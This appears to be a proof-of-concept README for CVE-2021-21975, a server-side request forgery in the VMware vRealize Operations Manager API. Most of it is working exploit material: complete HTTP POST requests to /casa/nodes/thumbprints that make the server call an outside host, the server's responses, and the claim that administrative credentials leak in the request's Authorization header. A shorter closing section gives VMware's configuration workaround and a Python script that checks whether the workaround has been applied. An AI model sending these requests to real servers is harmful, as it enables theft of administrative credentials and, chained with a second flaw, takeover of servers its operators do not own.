
CVE-2021-21975 PoC — VMware vRealize Operations Code Issue Vulnerability

Associated Vulnerability
Title: VMware vRealize Operations Code Issue Vulnerability (CVE-2021-21975)
Description: Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a Server Side Request Forgery attack to steal administrative credentials.
Description
[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)
Readme
<b>[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
vRealize Operations (vROps) is a self-driving IT operations management tool, powered by AI, that spans apps to infrastructure to optimize, plan and scale VMware Cloud and HCI deployments while unifying public cloud monitoring. VMware vRealize Operations Manager API `8.4 and all previous versions` are vulnerable to Server Side Request Forgery (SSRF). Successful exploitation of this vulnerability may allow an attacker to read or update internal resources; in this case, an attacker can easily steal the administrative credentials of the vROps server. By combining `CVE-2021-21975` and `CVE-2021-21983`, an attacker can run arbitrary code on the remote vRealize Operations server.

<b>Proof of Concept (PoC):</b> To exploit this vulnerability, you can use the following request:
```
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]
```
The response to the above request is shown below:
```
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]
```
<img width="1423" alt="Screen Shot 2021-04-03 at 01 03 29" src="https://user-images.githubusercontent.com/16391655/113457482-89629f80-9418-11eb-9b04-5b27e04868f4.png">
<img width="655" alt="Screen Shot 2021-04-03 at 01 18 07" src="https://user-images.githubusercontent.com/16391655/113458487-14449980-941b-11eb-8287-9b2760919413.png">

Administrative credentials are also disclosed in the `Authorization` header.

<img width="1599" alt="Screen Shot 2021-04-03 at 01 19 39" src="https://user-images.githubusercontent.com/16391655/113458525-38a07600-941b-11eb-98c3-11d402ba2214.png">
<img width="538" alt="Screen Shot 2021-04-03 at 01 24 34" src="https://user-images.githubusercontent.com/16391655/113459157-3f2fed00-941d-11eb-927f-1348cde965d2.png">

<b>Other Proof of Concepts (PoCs):</b> Alternatively, you can use the following requests to detect the CVE-2021-21975 VMware vRealize Operations Manager API Server Side Request Forgery (SSRF) vulnerability:

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]
```

```
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]
```
<img width="1207" alt="Screen Shot 2021-04-03 at 00 00 20" src="https://user-images.githubusercontent.com/16391655/113459054-009a3280-941d-11eb-996e-c54cfc2cba74.png">

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]
```

```
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]
```
<img width="551" alt="Screen Shot 2021-04-03 at 00 01 00" src="https://user-images.githubusercontent.com/16391655/113459621-b914a600-941e-11eb-901f-ee4212642a8b.png">

<b>Workaround Solution:</b> If the patch cannot be installed, or there is no patch for your version of vRealize Operations, the following steps can be taken to work around the issue. There is no impact to vRealize Operations when applying this workaround.

To work around this issue in vRealize Operations, remove a configuration line from `casa-security-context.xml`:

1. Log into the Primary node as root via SSH or Console (press ALT+F1 in a Console to log in).
2. Open `/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml`.
3. Find and remove the line: `<sec:http pattern="/nodes/thumbprints" security='none'/>`
4. Save and close the file.
5. Restart the CaSA service with this command: `service vmware-casa restart`
6. Repeat steps 1-5 on all other nodes in the vRealize Operations cluster.
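Added here as a verification aid for the workaround above (this is not part of the original README or of VMware's tooling): a Python check that parses a copy of `casa-security-context.xml` and reports whether the `security='none'` rule for `/nodes/thumbprints` from step 3 is still present. It assumes the file declares the standard Spring Security XML namespace; the embedded sample document is constructed to mirror the shape of that rule and is not copied from the product.

```python
import xml.etree.ElementTree as ET

# Standard Spring Security XML namespace; assumed to be what casa-security-context.xml declares
SEC_NS = "http://www.springframework.org/schema/security"
THUMBPRINT_PATTERN = "/nodes/thumbprints"

def unprotected_thumbprint_rules(xml_text):
    """Return (pattern, security) pairs for every <http> rule that leaves the
    thumbprints endpoint unauthenticated, i.e. the line step 3 says to remove."""
    root = ET.fromstring(xml_text)
    findings = []
    # Check the namespaced element and a bare <http>, so a file that declares
    # the element without any namespace is still covered.
    for tag in ("{%s}http" % SEC_NS, "http"):
        for el in root.iter(tag):
            pattern = el.get("pattern", "").strip()
            security = el.get("security", "").strip().lower()
            if pattern == THUMBPRINT_PATTERN and security == "none":
                findings.append((pattern, security))
    return findings

def workaround_applied(xml_text):
    """True when no security='none' rule remains for /nodes/thumbprints."""
    return not unprotected_thumbprint_rules(xml_text)

# Constructed sample that mirrors the shape of the rule quoted in step 3 (not the real file)
VULNERABLE_SAMPLE = """<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:sec="http://www.springframework.org/schema/security">
  <sec:http pattern="/nodes/thumbprints" security='none'/>
  <sec:http pattern="/**">
    <sec:intercept-url pattern="/**" access="ROLE_ADMIN"/>
  </sec:http>
</beans>
"""
# The same constructed document after the workaround line has been deleted
FIXED_SAMPLE = VULNERABLE_SAMPLE.replace(
    "  <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n", "")

if __name__ == "__main__":
    import sys  # usage: python check_casa.py /path/to/casa-security-context.xml
    with open(sys.argv[1], encoding="utf-8") as fh:
        hits = unprotected_thumbprint_rules(fh.read())
    print("workaround applied" if not hits else "NOT applied: %s" % hits)
```

Run it against the file on every node from step 6, since the workaround has to be applied cluster-wide.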

For more information, visit the following pages.

[https://kb.vmware.com/s/article/83210](https://kb.vmware.com/s/article/83210)<br>
[https://www.vmware.com/security/advisories/VMSA-2021-0004.html](https://www.vmware.com/security/advisories/VMSA-2021-0004.html)<br>
[https://f5.pm/go-66465.html](https://f5.pm/go-66465.html)